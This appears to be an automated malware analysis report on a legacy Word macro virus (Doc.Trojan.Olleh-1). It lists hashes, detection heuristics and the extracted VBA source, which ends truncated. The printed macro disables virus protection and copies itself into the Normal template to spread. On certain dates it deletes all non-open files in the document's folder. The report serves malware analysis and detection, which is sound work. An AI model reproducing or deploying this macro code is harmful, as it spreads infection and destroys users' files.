Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4408b28a26c84f56…

MALICIOUS

Office (OLE)

31.5 KB Created: 2001-05-24 10:27:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 7240e3a1c7d886609207ae9191b37512 SHA-1: 24b52ef89680463ebd1a044c714a6d2920277695 SHA-256: 4408b28a26c84f563f4f290fc478b7d12fc8c125e03397f045443d5a2dfb7a0a
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic macro markers and a VBA macro named 'hello' with AutoOpen and Auto_Close subroutines. The AutoOpen subroutine attempts to save the document as a template to 'c:\temp.dot' and potentially copy itself to the NormalTemplate, indicating an attempt to establish persistence or spread. The presence of legacy macro virus markers and the ClamAV detection strongly suggest malicious intent.

Heuristics 5

  • ClamAV: Doc.Trojan.Olleh-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Olleh-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13967 bytes
SHA-256: e41e8a291b9d0cee51fca506ca55e5026d6914bb58182a6e198d899bd1b2ae9b
Detection
ClamAV: Doc.Trojan.Olleh-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "hello"
Sub AutoOpen()
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.autoopen.autoopen"
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
 RecentFiles.Maximum = 0
On Error GoTo ErrorAO
iMacroCount = NormalTemplate.VBProject.VBComponents.Count
For i = 1 To iMacroCount
    If NormalTemplate.VBProject.VBComponents(i).Name = "hello" Then
        myflag = -1
    End If
Next i
If Not myflag Then

Application.OrganizerCopy Source:=ActiveDocument.FullName, _
        Destination:=NormalTemplate.FullName, Name _
        :="hello", Object:=wdOrganizerObjectProjectItems
End If
k = ActiveDocument.FullName
iMacroCount = Application.ActiveDocument.VBProject.VBComponents.Count
For i = 1 To iMacroCount
    If Application.ActiveDocument.VBProject.VBComponents(i).Name = "hello" Then
ActiveDocument.SaveAs FileName:="c:\temp.dot", FileFormat:=wdFormatTemplate
Application.ActiveDocument.SaveAs FileName:=k
End If
Next i
Application.ActiveDocument.SaveAs FileName:=k
Application.OrganizerCopy Source:="c:\temp.dot", Destination:=ActiveDocument.FullName, Name _
        :="hello", Object:=wdOrganizerObjectProjectItems
Application.ActiveDocument.SaveAs FileName:=k
ErrorAO:
End Sub
Sub ViewVBCode()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorVVBC
ErrorVVBC:
End Sub
Sub ToolsMacro()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorVVBC
ErrorVVBC:
End Sub
Sub filesave()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
 RecentFiles.Maximum = 0
On Error GoTo ErrorAO
iMacroCount = NormalTemplate.VBProject.VBComponents.Count
For i = 1 To iMacroCount
    If NormalTemplate.VBProject.VBComponents(i).Name = "hello" Then
        myflag = -1
    End If
Next i
If Not myflag Then

Application.OrganizerCopy Source:=ActiveDocument.FullName, _
        Destination:=NormalTemplate.FullName, Name _
        :="hello", Object:=wdOrganizerObjectProjectItems
End If
k = ActiveDocument.FullName
iMacroCount = Application.ActiveDocument.VBProject.VBComponents.Count
For i = 1 To iMacroCount
    If Application.ActiveDocument.VBProject.VBComponents(i).Name = "hello" Then
ActiveDocument.SaveAs FileName:="c:\temp.dot", FileFormat:=wdFormatTemplate
ActiveDocument.SaveAs FileName:=k
End If
Next i
Application.ActiveDocument.Save
Application.OrganizerCopy Source:="c:\temp.dot", Destination:=ActiveDocument.FullName, Name _
        :="hello", Object:=wdOrganizerObjectProjectItems
Application.ActiveDocument.Save
ErrorAO:
End Sub

Sub autoclose()
dt$ = Date
dt$ = Left(dt$, 2)
If dt$ = "05" Then
ActiveDocument.Save
ActiveDocument.Select
Selection.Delete
Selection.TypeText TEXT:="hello :))),"
ActiveDocument.Save
k$ = ActiveDocument.FullName
s$ = ActiveDocument.Name
n = Len(s$)
n1 = Len(k$)
n2 = n1 - n
k$ = Left(k$, n2)
myflag = True
On Error GoTo ErrorAO
myfile = Dir(k$ + "*.*")
Do While myfile <> ""
If myflag = True Then GoTo 1
ErrorAO:
myfile = Dir
1:
myflag = False
flag = False
For i = 1 To Application.Documents.Count
If myfile = Application.Documents(i).Name Then
flag = True
End If
Next i
If flag = False Then
Kill k$ + myfile
End If
Loop
End If

End Sub
Sub FileSaveAs()

On Error GoTo ErrorFSA

    Dialogs(wdDialogFileSaveAs).Show
k$ = ActiveDocument.FullName

n = Len(k$)
n = n - 3
k$ = Left(k$, n)
k$ = k$ & "doc"
ActiveDocument.SaveAs FileName:=k$
k$ = Left(k$, n)
k$ = k$ & "
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.